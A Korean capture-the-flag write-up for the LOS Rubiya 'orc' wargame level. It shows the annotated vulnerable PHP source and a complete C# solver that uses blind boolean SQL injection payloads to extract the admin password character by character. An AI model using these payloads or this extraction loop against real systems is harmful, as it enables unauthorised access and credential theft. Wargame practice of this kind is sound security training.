LOS Rubiya orc

2019. 8. 5. 22:49Wargame & CTF/LOS Rubiya

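<?php 
  // Source of the "orc" wargame level. It is an intentionally vulnerable
  // training target; the comments below mark where the weakness is and what a fix would be.
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  // Blocklist filter: rejects input containing "prob", "_", "." or the literal
  // two-character sequence "()" (case-insensitive). Quotes and SQL keywords pass
  // through, so this filter does not prevent SQL injection.
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  // First query: the raw pw parameter is interpolated into the SQL text with no
  // escaping or parameter binding, so the caller controls the WHERE clause.
  // A fix would bind pw through a prepared statement instead of building the string.
  $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  // The full query is echoed back to the client, and $query is not HTML-escaped.
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  // '@' suppresses warnings, so a failed query yields no visible error.
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  // "Hello admin" appears only when the first query returned a row. This makes
  // the response a true/false signal about whatever condition was injected.
  if($result['id']) echo "<h2>Hello admin</h2>"; 
   
  // Second query: the input is escaped with addslashes() before interpolation,
  // and the level is solved only if the row's pw equals the supplied value.
  // A condition that is merely true is not enough here; the stored pw is needed.
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc"); 
  highlight_file(__FILE__); 
?>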


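두 번째 쿼리는 addslashes를 거친 입력이 DB에 저장된 pw와 정확히 일치해야 solve가 호출되므로, 이제 비밀번호를 직접 알아내야 한다. 첫 번째 쿼리는 입력을 그대로 이어 붙이기 때문에 "Hello admin"이 출력되는지 여부를 참/거짓 신호로 쓸 수 있다.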

length(pw)=1, length(pw)=2 등을 차례로 넣어 보면서 먼저 pw의 길이를 알아내야 한다.

그 후에는 substr를 이용해서 pw를 한 글자씩 비교해 가면서 알아내야 한다.

다른 사람들은 자바나 파이썬을 써서 나는 특별히(?) C#을 썼다.


using System.Linq;
using System.Net;
using System.Text.RegularExpressions;
using System;
 
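namespace los_rubiya_orc
{
    /// <summary>
    /// Solver for the LOS "orc" wargame level. It uses the page's "Hello admin"
    /// output as a true/false signal: first to find the length of pw, then to
    /// compare pw one character at a time with substr, and finally it submits
    /// the recovered value.
    /// </summary>
    class Program
    {
        // Upper bound for the length probe. The value is a reviewer-chosen cap:
        // without it, an expired session (no "Hello admin" ever returned) would
        // send requests to the server forever.
        private const int MaxLength = 64;

        // Environment variable holding the caller's own PHPSESSID. The name is
        // constructed for this listing; a session cookie is a credential and
        // should not be hard-coded in published source.
        private const string SessionVariable = "LOS_PHPSESSID";

        /// <summary>
        /// Runs the length probe, the per-character probe and the final submission,
        /// printing progress to the console.
        /// </summary>
        /// <param name="args">Unused.</param>
        static void Main(string[] args)
        {
            string url = "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?";
            string password = "";
            string html;

            string sessionId = Environment.GetEnvironmentVariable(SessionVariable);
            if (string.IsNullOrEmpty(sessionId))
            {
                Console.WriteLine("ERROR!");
                Console.WriteLine("Set " + SessionVariable + " to your own session id.");
                return;
            }

            // WebClient is IDisposable; the using block releases it on every exit path.
            using (WebClient webClient = new WebClient())
            {
                webClient.Headers.Add(HttpRequestHeader.Cookie, "PHPSESSID=" + sessionId);

                // Step 1: find the length of pw.
                int length = 0;
                for (int candidate = 1; candidate <= MaxLength; candidate++)
                {
                    html = FetchText(webClient, url + "pw=' or length(pw)=" + candidate + "%23");
                    if (html.Contains("Hello admin"))
                    {
                        length = candidate;
                        break;
                    }
                }
                if (length == 0)
                {
                    Console.WriteLine("ERROR!");
                    Console.WriteLine("No length up to " + MaxLength + " matched; check the session id.");
                    return;
                }
                Console.WriteLine("Length : " + length);

                // Step 2: compare each position against the candidates produced by up().
                for (int i = 1; i <= length; i++)
                {
                    bool found = false;
                    // Stop at the end of printable ASCII instead of looping without end.
                    for (char pass = '0'; pass <= '~'; pass = up(pass))
                    {
                        html = FetchText(webClient, url + "pw=' or id='admin' and substr(pw, " + i + ", 1) = '" + pass.ToString() + "'%23");
                        if (html.Contains("Hello admin"))
                        {
                            password += pass.ToString();
                            Console.WriteLine("Password Found : " + password);
                            found = true;
                            break;
                        }
                    }
                    if (!found)
                    {
                        Console.WriteLine("ERROR!");
                        Console.WriteLine("No candidate matched at position " + i);
                        return;
                    }
                }

                // Step 3: submit the recovered value as a plain pw parameter.
                Console.WriteLine("All Password Found! Auto Solving...");
                html = FetchText(webClient, url + "pw=" + password);
                if (!html.Contains("ORC Clear!"))
                {
                    Console.WriteLine("ERROR!");
                    Console.WriteLine(html);
                }
                else
                {
                    Console.WriteLine("OK");
                }
            }
        }

        /// <summary>
        /// Downloads <paramref name="address"/> and removes everything that looks
        /// like an HTML tag, so the marker text can be matched with Contains.
        /// </summary>
        /// <param name="client">Client that already carries the session cookie.</param>
        /// <param name="address">Full request URL.</param>
        /// <returns>The response body with tags stripped.</returns>
        private static string FetchText(WebClient client, string address)
        {
            return Regex.Replace(client.DownloadString(address), "<.*?>", String.Empty);
        }

        /// <summary>
        /// Returns the next candidate character: the following code point, except
        /// that everything between '9' and 'a' is skipped.
        /// </summary>
        /// <param name="password">Current candidate character.</param>
        /// <returns>The next candidate character.</returns>
        static char up(char password)
        {
            password++;
            if (password > '9' && password < 'a')
            {
                password = 'a';
            }
            return password;
        }
    }
}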

